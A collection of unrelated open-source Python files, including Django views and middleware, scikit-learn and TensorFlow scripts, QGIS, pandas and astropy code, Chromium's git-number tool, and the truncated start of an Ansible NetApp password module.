vendor/django/django/contrib/staticfiles/views.py
|
98
|
"""
Views and functions for serving static files. These are only to be used during
development, and SHOULD NOT be used in a production setting.
"""
import os
import posixpath
import urllib
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.http import Http404
from django.views import static
from django.contrib.staticfiles import finders
def serve(request, path, document_root=None, insecure=False, **kwargs):
"""
Serve static files below a given point in the directory structure or
from locations inferred from the staticfiles finders.
To use, put a URL pattern such as::
(r'^(?P<path>.*)$', 'django.contrib.staticfiles.views.serve')
in your URLconf.
It uses the django.views.static view to serve the found files.
"""
if not settings.DEBUG and not insecure:
raise ImproperlyConfigured("The staticfiles view can only be used in "
"debug mode or if the the --insecure "
"option of 'runserver' is used")
normalized_path = posixpath.normpath(urllib.unquote(path)).lstrip('/')
absolute_path = finders.find(normalized_path)
if not absolute_path:
if path.endswith('/') or path == '':
raise Http404("Directory indexes are not allowed here.")
raise Http404("'%s' could not be found" % path)
document_root, path = os.path.split(absolute_path)
return static.serve(request, path, document_root=document_root, **kwargs)
|
akionakamura/scikit-learn
|
refs/heads/master
|
examples/model_selection/randomized_search.py
|
201
|
"""
=========================================================================
Comparing randomized search and grid search for hyperparameter estimation
=========================================================================
Compare randomized search and grid search for optimizing hyperparameters of a
random forest.
All parameters that influence the learning are searched simultaneously
(except for the number of estimators, which poses a time / quality tradeoff).
The randomized search and the grid search explore exactly the same space of
parameters. The result in parameter settings is quite similar, while the run
time for randomized search is drastically lower.
The performance is slightly worse for the randomized search, though this
is most likely a noise effect and would not carry over to a held-out test set.
Note that in practice, one would not search over this many different parameters
simultaneously using grid search, but pick only the ones deemed most important.
"""
print(__doc__)
import numpy as np
from time import time
from operator import itemgetter
from scipy.stats import randint as sp_randint
from sklearn.grid_search import GridSearchCV, RandomizedSearchCV
from sklearn.datasets import load_digits
from sklearn.ensemble import RandomForestClassifier
# get some data
digits = load_digits()
X, y = digits.data, digits.target
# build a classifier
clf = RandomForestClassifier(n_estimators=20)
# Utility function to report best scores
def report(grid_scores, n_top=3):
top_scores = sorted(grid_scores, key=itemgetter(1), reverse=True)[:n_top]
for i, score in enumerate(top_scores):
print("Model with rank: {0}".format(i + 1))
print("Mean validation score: {0:.3f} (std: {1:.3f})".format(
score.mean_validation_score,
np.std(score.cv_validation_scores)))
print("Parameters: {0}".format(score.parameters))
print("")
# specify parameters and distributions to sample from
param_dist = {"max_depth": [3, None],
"max_features": sp_randint(1, 11),
"min_samples_split": sp_randint(1, 11),
"min_samples_leaf": sp_randint(1, 11),
"bootstrap": [True, False],
"criterion": ["gini", "entropy"]}
# run randomized search
n_iter_search = 20
random_search = RandomizedSearchCV(clf, param_distributions=param_dist,
n_iter=n_iter_search)
start = time()
random_search.fit(X, y)
print("RandomizedSearchCV took %.2f seconds for %d candidates"
" parameter settings." % ((time() - start), n_iter_search))
report(random_search.grid_scores_)
# use a full grid over all parameters
param_grid = {"max_depth": [3, None],
"max_features": [1, 3, 10],
"min_samples_split": [1, 3, 10],
"min_samples_leaf": [1, 3, 10],
"bootstrap": [True, False],
"criterion": ["gini", "entropy"]}
# run grid search
grid_search = GridSearchCV(clf, param_grid=param_grid)
start = time()
grid_search.fit(X, y)
print("GridSearchCV took %.2f seconds for %d candidate parameter settings."
% (time() - start, len(grid_search.grid_scores_)))
report(grid_search.grid_scores_)
|
pavlova-marina/QGIS
|
refs/heads/master
|
python/plugins/processing/algs/qgis/FieldsCalculator.py
|
4
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
FieldsCalculator.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import QVariant
from qgis.core import QgsExpression, QgsFeature, QgsField, QgsDistanceArea, QgsProject, GEO_NONE
from qgis.utils import iface
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.GeoAlgorithmExecutionException import GeoAlgorithmExecutionException
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterString
from processing.core.parameters import ParameterNumber
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterSelection
from processing.core.outputs import OutputVector
from processing.tools import dataobjects, vector, system
from ui.FieldsCalculatorDialog import FieldsCalculatorDialog
class FieldsCalculator(GeoAlgorithm):
INPUT_LAYER = 'INPUT_LAYER'
NEW_FIELD = 'NEW_FIELD'
FIELD_NAME = 'FIELD_NAME'
FIELD_TYPE = 'FIELD_TYPE'
FIELD_LENGTH = 'FIELD_LENGTH'
FIELD_PRECISION = 'FIELD_PRECISION'
FORMULA = 'FORMULA'
OUTPUT_LAYER = 'OUTPUT_LAYER'
TYPE_NAMES = ['Float', 'Integer', 'String', 'Date']
TYPES = [QVariant.Double, QVariant.Int, QVariant.String, QVariant.Date]
def defineCharacteristics(self):
self.name = 'Field calculator'
self.group = 'Vector table tools'
self.addParameter(ParameterVector(self.INPUT_LAYER,
self.tr('Input layer'), [ParameterVector.VECTOR_TYPE_ANY], False))
self.addParameter(ParameterString(self.FIELD_NAME,
self.tr('Result field name')))
self.addParameter(ParameterSelection(self.FIELD_TYPE,
self.tr('Field type'), self.TYPE_NAMES))
self.addParameter(ParameterNumber(self.FIELD_LENGTH,
self.tr('Field length'), 1, 255, 10))
self.addParameter(ParameterNumber(self.FIELD_PRECISION,
self.tr('Field precision'), 0, 15, 3))
self.addParameter(ParameterBoolean(self.NEW_FIELD,
self.tr('Create new field'), True))
self.addParameter(ParameterString(self.FORMULA, self.tr('Formula')))
self.addOutput(OutputVector(self.OUTPUT_LAYER, self.tr('Output layer')))
def processAlgorithm(self, progress):
layer = dataobjects.getObjectFromUri(self.getParameterValue(self.INPUT_LAYER))
fieldName = self.getParameterValue(self.FIELD_NAME)
fieldType = self.TYPES[self.getParameterValue(self.FIELD_TYPE)]
width = self.getParameterValue(self.FIELD_LENGTH)
precision = self.getParameterValue(self.FIELD_PRECISION)
newField = self.getParameterValue(self.NEW_FIELD)
formula = self.getParameterValue(self.FORMULA)
output = self.getOutputFromName(self.OUTPUT_LAYER)
if output.value == '':
ext = output.getDefaultFileExtension(self)
output.value = system.getTempFilenameInTempFolder(
output.name + '.' + ext)
provider = layer.dataProvider()
fields = layer.pendingFields()
if newField:
fields.append(QgsField(fieldName, fieldType, '', width, precision))
writer = output.getVectorWriter(fields, provider.geometryType(),
layer.crs())
exp = QgsExpression(formula)
da = QgsDistanceArea()
da.setSourceCrs(layer.crs().srsid())
da.setEllipsoidalMode(
iface.mapCanvas().mapSettings().hasCrsTransformEnabled())
da.setEllipsoid(QgsProject.instance().readEntry(
'Measure', '/Ellipsoid', GEO_NONE)[0])
exp.setGeomCalculator(da)
if not exp.prepare(layer.pendingFields()):
raise GeoAlgorithmExecutionException(
self.tr('Evaluation error: %s' % exp.evalErrorString()))
outFeature = QgsFeature()
outFeature.initAttributes(len(fields))
outFeature.setFields(fields)
error = ''
calculationSuccess = True
current = 0
features = vector.features(layer)
total = 100.0 / len(features)
rownum = 1
for current, f in enumerate(features):
rownum = current + 1
exp.setCurrentRowNumber(rownum)
value = exp.evaluate(f)
if exp.hasEvalError():
calculationSuccess = False
error = exp.evalErrorString()
break
else:
outFeature.setGeometry(f.geometry())
for fld in f.fields():
outFeature[fld.name()] = f[fld.name()]
outFeature[fieldName] = value
writer.addFeature(outFeature)
progress.setPercentage(int(current * total))
del writer
if not calculationSuccess:
raise GeoAlgorithmExecutionException(
self.tr('An error occured while evaluating the calculation '
'string:\n%s' % error))
def checkParameterValuesBeforeExecuting(self):
newField = self.getParameterValue(self.NEW_FIELD)
fieldName = self.getParameterValue(self.FIELD_NAME)
if newField and len(fieldName) == 0:
raise GeoAlgorithmExecutionException(
self.tr('Field name is not set. Please enter a field name'))
outputName = self.getOutputValue(self.OUTPUT_LAYER)
if outputName == '':
raise GeoAlgorithmExecutionException(
self.tr('Output is not set. Please specify valid filename'))
def getCustomParametersDialog(self):
return FieldsCalculatorDialog(self)
|
illicitonion/givabit
|
refs/heads/master
|
lib/sdks/google_appengine_1.7.1/google_appengine/lib/django_0_96/django/middleware/transaction.py
|
447
|
from django.db import transaction
class TransactionMiddleware(object):
"""
Transaction middleware. If this is enabled, each view function will be run
with commit_on_response activated - that way a save() doesn't do a direct
commit, the commit is done when a successful response is created. If an
exception happens, the database is rolled back.
"""
def process_request(self, request):
"""Enters transaction management"""
transaction.enter_transaction_management()
transaction.managed(True)
def process_exception(self, request, exception):
"""Rolls back the database and leaves transaction management"""
if transaction.is_dirty():
transaction.rollback()
transaction.leave_transaction_management()
def process_response(self, request, response):
"""Commits and leaves transaction management."""
if transaction.is_managed():
if transaction.is_dirty():
transaction.commit()
transaction.leave_transaction_management()
return response
|
pandaxcl/gyp
|
refs/heads/master
|
test/win/linker-flags/update_pgd.py
|
106
|
#!/usr/bin/env python
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from optparse import OptionParser
import glob
import os
import subprocess
parser = OptionParser()
parser.add_option('--exe', dest='exe')
parser.add_option('--vcbindir', dest='vcbindir')
parser.add_option('--pgd', dest='pgd')
(options, args) = parser.parse_args()
# Instrumented binaries fail to run unless the Visual C++'s bin dir is included
# in the PATH environment variable.
os.environ['PATH'] = os.environ['PATH'] + os.pathsep + options.vcbindir
# Run Instrumented binary. The profile will be recorded into *.pgc file.
subprocess.call([options.exe])
# Merge *.pgc files into a *.pgd (Profile-Guided Database) file.
subprocess.call(['pgomgr', '/merge', options.pgd])
# *.pgc files are no longer necessary. Clear all of them.
pgd_file = os.path.abspath(options.pgd)
pgd_dir = os.path.dirname(pgd_file)
(pgd_basename, _) = os.path.splitext(os.path.basename(pgd_file))
pgc_filepattern = os.path.join(pgd_dir, '%s!*.pgc' % pgd_basename)
pgc_files= glob.glob(pgc_filepattern)
for pgc_file in pgc_files:
os.unlink(pgc_file)
|
csuttles/utils
|
refs/heads/master
|
python/todo-api/flask/lib/python2.7/site-packages/pkg_resources/_vendor/packaging/_compat.py
|
901
|
# Copyright 2014 Donald Stufft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
import sys
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
# flake8: noqa
if PY3:
string_types = str,
else:
string_types = basestring,
def with_metaclass(meta, *bases):
"""
Create a base class with a metaclass.
"""
# This requires a bit of explanation: the basic idea is to make a dummy
# metaclass for one level of class instantiation that replaces itself with
# the actual metaclass.
class metaclass(meta):
def __new__(cls, name, this_bases, d):
return meta(name, bases, d)
return type.__new__(metaclass, 'temporary_class', (), {})
|
accentgan/iclr2018
|
refs/heads/master
|
main.py
|
1
|
from __future__ import print_function
import tensorflow as tf
import numpy as np
from model import SEGAN, SEAE
from gru_model import GRUGAN
from ddpg_model import DDPGGAN
import os
from tensorflow.python.client import device_lib
from scipy.io import wavfile
from data_loader import pre_emph
devices = device_lib.list_local_devices()
flags = tf.app.flags
flags.DEFINE_integer("seed",111, "Random seed (Def: 111).")
flags.DEFINE_integer("epoch", 150, "Epochs to train (Def: 150).")
flags.DEFINE_integer("batch_size", 150, "Batch size (Def: 150).")
flags.DEFINE_integer("save_freq", 1000, "Batch save freq (Def: 50).")
flags.DEFINE_integer("canvas_size", 2**13, "Canvas size (Def: 2^14).")
flags.DEFINE_integer("denoise_epoch", 5, "Epoch where noise in disc is "
"removed (Def: 5).")
flags.DEFINE_integer("l1_remove_epoch", 150, "Epoch where L1 in G is "
"removed (Def: 150).")
flags.DEFINE_boolean("bias_deconv", True,
"Flag to specify if we bias deconvs (Def: False)")
flags.DEFINE_boolean("bias_downconv", True,
"flag to specify if we bias downconvs (def: false)")
flags.DEFINE_boolean("bias_D_conv", True,
"flag to specify if we bias D_convs (def: false)")
# TODO: noise decay is under check
flags.DEFINE_float("denoise_lbound", 0.01, "Min noise std to be still alive (Def: 0.001)")
flags.DEFINE_float("noise_decay", 0.7, "Decay rate of noise std (Def: 0.7)")
flags.DEFINE_float("d_label_smooth", 0.25, "Smooth factor in D (Def: 0.25)")
flags.DEFINE_float("init_noise_std", 0.5, "Init noise std (Def: 0.5)")
flags.DEFINE_float("init_l1_weight", 100., "Init L1 lambda (Def: 100)")
flags.DEFINE_integer("z_dim", 256, "Dimension of input noise to G (Def: 256).")
flags.DEFINE_integer("z_depth", 256, "Depth of input noise to G (Def: 256).")
flags.DEFINE_string("save_path", "segan_results", "Path to save out model "
"files. (Def: dwavegan_model"
").")
flags.DEFINE_string("g_nl", "leaky", "Type of nonlinearity in G: leaky or prelu. (Def: leaky).")
flags.DEFINE_string("model", "gan", "Type of model to train: gan or ae. (Def: gan).")
flags.DEFINE_string("deconv_type", "deconv", "Type of deconv method: deconv or "
"nn_deconv (Def: deconv).")
flags.DEFINE_string("g_type", "ae", "Type of G to use: ae or dwave. (Def: ae).")
flags.DEFINE_float("g_learning_rate", 0.0002, "G learning_rate (Def: 0.0002)")
flags.DEFINE_float("d_learning_rate", 0.0002, "D learning_rate (Def: 0.0002)")
flags.DEFINE_float("beta_1", 0.5, "Adam beta 1 (Def: 0.5)")
flags.DEFINE_float("preemph", 0.95, "Pre-emph factor (Def: 0.95)")
flags.DEFINE_string("synthesis_path", "dwavegan_samples", "Path to save output"
" generated samples."
" (Def: dwavegan_sam"
"ples).")
flags.DEFINE_string("e2e_dataset", "data/cslu.tfrecords", "TFRecords"
" (Def: data/"
"segan.tfrecords.")
flags.DEFINE_string("save_clean_path", "test_clean_results", "Path to save clean utts")
flags.DEFINE_string("test_wav", None, "name of test wav (it won't train)")
flags.DEFINE_string("weights", None, "Weights file")
flags.DEFINE_integer("accent_class",5,"number of classes of accents")
flags.DEFINE_integer("slice_num",4,"number of recurrent iterations")
flags.DEFINE_float("g_policy_learning_rate", 5e-4, "Learning rate for generator network in policy gradient setting")
flags.DEFINE_boolean("adam",True, "Whether to use Adam for policy gradients")
flags.DEFINE_integer("num_runs",2, "Number of runs for estimating reward function in MC manner")
flags.DEFINE_integer("start_epoch",0,"Starting epoch while training")
flags.DEFINE_integer("sample_rate",8e3,"value of sample rate for speech document")
FLAGS = flags.FLAGS
def pre_emph_test(coeff, canvas_size):
x_ = tf.placeholder(tf.float32, shape=[canvas_size,])
x_preemph = pre_emph(x_, coeff)
return x_, x_preemph
def main(_):
print('Parsed arguments: ', FLAGS.__flags)
# make save path if it is required
if not os.path.exists(FLAGS.save_path):
os.makedirs(FLAGS.save_path)
if not os.path.exists(FLAGS.synthesis_path):
os.makedirs(FLAGS.synthesis_path)
np.random.seed(FLAGS.seed)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.allow_soft_placement=True
udevices = []
for device in devices:
if len(devices) > 1 and 'cpu' in device.name:
# Use cpu only when we dont have gpus
continue
print('Using device: ', device.name)
udevices.append(device.name)
# execute the session
with tf.Session(config=config) as sess:
if FLAGS.model == 'gan':
print('Creating GAN model')
se_model = SEGAN(sess, FLAGS, udevices)
elif FLAGS.model == 'ae':
print('Creating AE model')
se_model = SEAE(sess, FLAGS, udevices)
elif FLAGS.model == 'gru' :
print("Creating GRU model")
se_model = GRUGAN(sess, FLAGS, udevices)
elif FLAGS.model == 'ddpg' :
print("Creating DDPG model")
se_model = DDPGGAN(sess, FLAGS, udevices)
else:
raise ValueError('{} model type not understood!'.format(FLAGS.model))
if FLAGS.test_wav is None:
se_model.train(FLAGS, udevices)
else:
if FLAGS.weights is None:
raise ValueError('weights must be specified!')
print('Loading model weights...')
se_model.load(FLAGS.save_path, FLAGS.weights)
fm, wav_data = wavfile.read(FLAGS.test_wav)
wavname = FLAGS.test_wav.split('/')[-1]
if fm != 16000:
raise ValueError('16kHz required! Test file is different')
wave = (2./65535.) * (wav_data.astype(np.float32) - 32767) + 1.
if FLAGS.preemph > 0:
print('preemph test wave with {}'.format(FLAGS.preemph))
x_pholder, preemph_op = pre_emph_test(FLAGS.preemph, wave.shape[0])
wave = sess.run(preemph_op, feed_dict={x_pholder:wave})
print('test wave shape: ', wave.shape)
print('test wave min:{} max:{}'.format(np.min(wave), np.max(wave)))
c_wave = se_model.clean(wave)
print('c wave min:{} max:{}'.format(np.min(c_wave), np.max(c_wave)))
wavfile.write(os.path.join(FLAGS.save_clean_path, wavname), 16e3, c_wave)
print('Done cleaning {} and saved '
'to {}'.format(FLAGS.test_wav,
os.path.join(FLAGS.save_clean_path, wavname)))
if __name__ == '__main__':
tf.app.run()
|
tbabej/astropy
|
refs/heads/master
|
astropy/utils/tests/data/test_package/__init__.py
|
4
|
from astropy.utils.data import get_pkg_data_filename
def get_data_filename():
return get_pkg_data_filename('data/foo.txt')
|
mbayon/TFG-MachineLearning
|
refs/heads/master
|
venv/lib/python3.6/site-packages/pandas/tests/indexes/datetimes/test_formats.py
|
15
|
from pandas import DatetimeIndex
import numpy as np
import pandas.util.testing as tm
import pandas as pd
def test_to_native_types():
index = DatetimeIndex(freq='1D', periods=3, start='2017-01-01')
# First, with no arguments.
expected = np.array(['2017-01-01', '2017-01-02',
'2017-01-03'], dtype=object)
result = index.to_native_types()
tm.assert_numpy_array_equal(result, expected)
# No NaN values, so na_rep has no effect
result = index.to_native_types(na_rep='pandas')
tm.assert_numpy_array_equal(result, expected)
# Make sure slicing works
expected = np.array(['2017-01-01', '2017-01-03'], dtype=object)
result = index.to_native_types([0, 2])
tm.assert_numpy_array_equal(result, expected)
# Make sure date formatting works
expected = np.array(['01-2017-01', '01-2017-02',
'01-2017-03'], dtype=object)
result = index.to_native_types(date_format='%m-%Y-%d')
tm.assert_numpy_array_equal(result, expected)
# NULL object handling should work
index = DatetimeIndex(['2017-01-01', pd.NaT, '2017-01-03'])
expected = np.array(['2017-01-01', 'NaT', '2017-01-03'], dtype=object)
result = index.to_native_types()
tm.assert_numpy_array_equal(result, expected)
expected = np.array(['2017-01-01', 'pandas',
'2017-01-03'], dtype=object)
result = index.to_native_types(na_rep='pandas')
tm.assert_numpy_array_equal(result, expected)
|
endlessm/chromium-browser
|
refs/heads/master
|
tools/swarming_client/third_party/depot_tools/git_number.py
|
1
|
#!/usr/bin/env vpython3
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Usage: %prog [options] [<commitref>]*
If no <commitref>'s are supplied, it defaults to HEAD.
Calculates the generation number for one or more commits in a git repo.
Generation number of a commit C with parents P is defined as:
generation_number(C, []) = 0
generation_number(C, P) = max(map(generation_number, P)) + 1
This number can be used to order commits relative to each other, as long as for
any pair of the commits, one is an ancestor of the other.
Since calculating the generation number of a commit requires walking that
commit's entire history, this script caches all calculated data inside the git
repo that it operates on in the ref 'refs/number/commits'.
"""
from __future__ import print_function
from __future__ import division
import binascii
import collections
import logging
import optparse
import os
import struct
import sys
import tempfile
import git_common as git
import subprocess2
CHUNK_FMT = '!20sL'
CHUNK_SIZE = struct.calcsize(CHUNK_FMT)
DIRTY_TREES = collections.defaultdict(int)
REF = 'refs/number/commits'
AUTHOR_NAME = 'git-number'
AUTHOR_EMAIL = 'chrome-infrastructure-team@google.com'
# Number of bytes to use for the prefix on our internal number structure.
# 0 is slow to deserialize. 2 creates way too much bookeeping overhead (would
# need to reimplement cache data structures to be a bit more sophisticated than
# dicts. 1 seems to be just right.
PREFIX_LEN = 1
# Set this to 'threads' to gather coverage data while testing.
POOL_KIND = 'procs'
def pathlify(hash_prefix):
"""Converts a binary object hash prefix into a posix path, one folder per
byte.
>>> pathlify('\xDE\xAD')
'de/ad'
"""
if sys.version_info.major == 3:
return '/'.join('%02x' % b for b in hash_prefix)
else:
return '/'.join('%02x' % ord(b) for b in hash_prefix)
@git.memoize_one(threadsafe=False)
def get_number_tree(prefix_bytes):
"""Returns a dictionary of the git-number registry specified by
|prefix_bytes|.
This is in the form of {<full binary ref>: <gen num> ...}
>>> get_number_tree('\x83\xb4')
{'\x83\xb4\xe3\xe4W\xf9J*\x8f/c\x16\xecD\xd1\x04\x8b\xa9qz': 169, ...}
"""
ref = '%s:%s' % (REF, pathlify(prefix_bytes))
try:
raw = git.run('cat-file', 'blob', ref, autostrip=False, decode=False)
return dict(struct.unpack_from(CHUNK_FMT, raw, i * CHUNK_SIZE)
for i in range(len(raw) // CHUNK_SIZE))
except subprocess2.CalledProcessError:
return {}
@git.memoize_one(threadsafe=False)
def get_num(commit_hash):
"""Returns the generation number for a commit.
Returns None if the generation number for this commit hasn't been calculated
yet (see load_generation_numbers()).
"""
return get_number_tree(commit_hash[:PREFIX_LEN]).get(commit_hash)
def clear_caches(on_disk=False):
"""Clears in-process caches for e.g. unit testing."""
get_number_tree.clear()
get_num.clear()
if on_disk:
git.run('update-ref', '-d', REF)
def intern_number_tree(tree):
"""Transforms a number tree (in the form returned by |get_number_tree|) into
a git blob.
Returns the git blob id as hex-encoded string.
>>> d = {'\x83\xb4\xe3\xe4W\xf9J*\x8f/c\x16\xecD\xd1\x04\x8b\xa9qz': 169}
>>> intern_number_tree(d)
'c552317aa95ca8c3f6aae3357a4be299fbcb25ce'
"""
with tempfile.TemporaryFile() as f:
for k, v in sorted(tree.items()):
f.write(struct.pack(CHUNK_FMT, k, v))
f.seek(0)
return git.intern_f(f)
def leaf_map_fn(pre_tree):
"""Converts a prefix and number tree into a git index line."""
pre, tree = pre_tree
return '100644 blob %s\t%s\0' % (intern_number_tree(tree), pathlify(pre))
def finalize(targets):
"""Saves all cache data to the git repository.
After calculating the generation number for |targets|, call finalize() to
save all the work to the git repository.
This in particular saves the trees referred to by DIRTY_TREES.
"""
if not DIRTY_TREES:
return
msg = 'git-number Added %s numbers' % sum(DIRTY_TREES.values())
idx = os.path.join(git.run('rev-parse', '--git-dir'), 'number.idx')
env = os.environ.copy()
env['GIT_INDEX_FILE'] = idx
progress_message = 'Finalizing: (%%(count)d/%d)' % len(DIRTY_TREES)
with git.ProgressPrinter(progress_message) as inc:
git.run('read-tree', REF, env=env)
prefixes_trees = ((p, get_number_tree(p)) for p in sorted(DIRTY_TREES))
updater = subprocess2.Popen(['git', 'update-index', '-z', '--index-info'],
stdin=subprocess2.PIPE, env=env)
with git.ScopedPool(kind=POOL_KIND) as leaf_pool:
for item in leaf_pool.imap(leaf_map_fn, prefixes_trees):
updater.stdin.write(item.encode())
inc()
updater.stdin.close()
updater.wait()
assert updater.returncode == 0
tree_id = git.run('write-tree', env=env)
commit_cmd = [
# Git user.name and/or user.email may not be configured, so specifying
# them explicitly. They are not used, but requried by Git.
'-c', 'user.name=%s' % AUTHOR_NAME,
'-c', 'user.email=%s' % AUTHOR_EMAIL,
'commit-tree',
'-m', msg,
'-p'] + git.hash_multi(REF)
for t in targets:
commit_cmd.extend(['-p', binascii.hexlify(t).decode()])
commit_cmd.append(tree_id)
commit_hash = git.run(*commit_cmd)
git.run('update-ref', REF, commit_hash)
DIRTY_TREES.clear()
def preload_tree(prefix):
"""Returns the prefix and parsed tree object for the specified prefix."""
return prefix, get_number_tree(prefix)
def all_prefixes(depth=PREFIX_LEN):
if sys.version_info.major == 3:
prefixes = [bytes([i]) for i in range(255)]
else:
prefixes = [chr(i) for i in range(255)]
for x in prefixes:
# This isn't covered because PREFIX_LEN currently == 1
if depth > 1: # pragma: no cover
for r in all_prefixes(depth - 1):
yield x + r
else:
yield x
def load_generation_numbers(targets):
"""Populates the caches of get_num and get_number_tree so they contain
the results for |targets|.
Loads cached numbers from disk, and calculates missing numbers if one or
more of |targets| is newer than the cached calculations.
Args:
targets - An iterable of binary-encoded full git commit hashes.
"""
# In case they pass us a generator, listify targets.
targets = list(targets)
if all(get_num(t) is not None for t in targets):
return
if git.tree(REF) is None:
empty = git.mktree({})
commit_hash = git.run(
# Git user.name and/or user.email may not be configured, so specifying
# them explicitly. They are not used, but requried by Git.
'-c', 'user.name=%s' % AUTHOR_NAME,
'-c', 'user.email=%s' % AUTHOR_EMAIL,
'commit-tree',
'-m', 'Initial commit from git-number',
empty)
git.run('update-ref', REF, commit_hash)
with git.ScopedPool(kind=POOL_KIND) as pool:
preload_iter = pool.imap_unordered(preload_tree, all_prefixes())
rev_list = []
with git.ProgressPrinter('Loading commits: %(count)d') as inc:
# Curiously, buffering the list into memory seems to be the fastest
# approach in python (as opposed to iterating over the lines in the
# stdout as they're produced). GIL strikes again :/
cmd = [
'rev-list', '--topo-order', '--parents', '--reverse', '^' + REF,
] + [binascii.hexlify(target).decode() for target in targets]
for line in git.run(*cmd).splitlines():
tokens = [binascii.unhexlify(token) for token in line.split()]
rev_list.append((tokens[0], tokens[1:]))
inc()
get_number_tree.update(preload_iter)
with git.ProgressPrinter('Counting: %%(count)d/%d' % len(rev_list)) as inc:
for commit_hash, pars in rev_list:
num = max(map(get_num, pars)) + 1 if pars else 0
prefix = commit_hash[:PREFIX_LEN]
get_number_tree(prefix)[commit_hash] = num
DIRTY_TREES[prefix] += 1
get_num.set(commit_hash, num)
inc()
def main(): # pragma: no cover
parser = optparse.OptionParser(usage=sys.modules[__name__].__doc__)
parser.add_option('--no-cache', action='store_true',
help='Do not actually cache anything we calculate.')
parser.add_option('--reset', action='store_true',
help='Reset the generation number cache and quit.')
parser.add_option('-v', '--verbose', action='count', default=0,
help='Be verbose. Use more times for more verbosity.')
opts, args = parser.parse_args()
levels = [logging.ERROR, logging.INFO, logging.DEBUG]
logging.basicConfig(level=levels[min(opts.verbose, len(levels) - 1)])
# 'git number' should only be used on bots.
if os.getenv('CHROME_HEADLESS') != '1':
logging.error("'git-number' is an infrastructure tool that is only "
"intended to be used internally by bots. Developers should "
"use the 'Cr-Commit-Position' value in the commit's message.")
return 1
if opts.reset:
clear_caches(on_disk=True)
return
try:
targets = git.parse_commitrefs(*(args or ['HEAD']))
except git.BadCommitRefException as e:
parser.error(e)
load_generation_numbers(targets)
if not opts.no_cache:
finalize(targets)
print('\n'.join(map(str, map(get_num, targets))))
return 0
if __name__ == '__main__': # pragma: no cover
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(1)
|
pgleeson/TempRepo3
|
refs/heads/master
|
pythonnC/Ex2_SaveProject.py
|
5
|
#
#
# A file which opens a neuroConstruct project, changes the value of the
# amplitude in the electrical stimulation to a random value, then saves the project
#
# Author: Padraig Gleeson
#
# This file has been developed as part of the neuroConstruct project
# This work has been funded by the Medical Research Council and the
# Wellcome Trust
#
#
try:
from java.io import File
from java.lang import System
except ImportError:
print "Note: this file should be run using ..\\nC.bat -python XXX.py' or './nC.sh -python XXX.py'"
print "See http://www.neuroconstruct.org/docs/python.html for more details"
quit()
from ucl.physiol.neuroconstruct.project import ProjectManager
from ucl.physiol.neuroconstruct.utils import NumberGenerator
from math import *
from random import *
# Load an existing neuroConstruct project
projFile = File("TestPython/TestPython.neuro.xml")
print "Loading project from file: " + projFile.getAbsolutePath()+", exists: "+ str(projFile.exists())
pm = ProjectManager()
myProject = pm.loadProject(projFile)
print "Loaded project: " + myProject.getProjectName()
# Get first electrical stimulation & reset it
stim = myProject.elecInputInfo.getStim(0)
print "First stimulation setting: "+ str(stim)
newAmp = random()*0.2
stim.setAmp(NumberGenerator(newAmp))
myProject.elecInputInfo.updateStim(stim)
print "Stimulation now: "+ str(myProject.elecInputInfo.getStim(0))
# Save project & exit
myProject.markProjectAsEdited()
myProject.saveProject()
System.exit(0)
|
mgit-at/ansible
|
refs/heads/devel
|
lib/ansible/modules/storage/netapp/netapp_e_auth.py
|
5
|
#!/usr/bin/python
# (c) 2016, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: netapp_e_auth
short_description: NetApp E-Series set or update the password for a storage array.
description:
- Sets or updates the password for a storage array. When the password is updated on the storage array, it must be updated on the SANtricity Web
Services proxy. Note, all storage arrays do not have a Monitor or RO role.
version_added: "2.2"
author: Kevin Hulquest (@hulquest)
options:
validate_certs:
required: false
default: true
description:
- Should https certificates be validated?
type: bool
name:
description:
- The name of the storage array. Note that if more than one storage array with this name is detected, the task will fail and you'll have to use
the ID instead.
required: False
ssid:
description:
- the identifier of the storage array in the Web Services Proxy.
required: False
set_admin:
description:
- Boolean value on whether to update the admin password. If set to false then the RO account is updated.
type: bool
default: False
current_password:
description:
- The current admin password. This is not required if the password hasn't been set before.
required: False
new_password:
description:
- The password you would like to set. Cannot be more than 30 characters.
required: True
api_url:
description:
- The full API url.
- "Example: http://ENDPOINT:8080/devmgr/v2"
- This can optionally be set via an environment variable, API_URL
required: False
api_username:
description:
- The username used to authenticate against the API
- This can optionally be set via an environment variable, API_USERNAME
required: False
api_password:
description:
- The password used to authenticate against the API
- This can optionally be set via an environment variable, API_PASSWORD
required: False
'''
EXAMPLES = '''
- name: Test module
netapp_e_auth:
name: trex
current_password: OldPasswd
new_password: NewPasswd
set_admin: yes
api_url: '{{ netapp_api_url }}'
api_username: '{{ netapp_api_username }}'
api_password: '{{ netapp_api_password }}'
'''
RETURN = '''
msg:
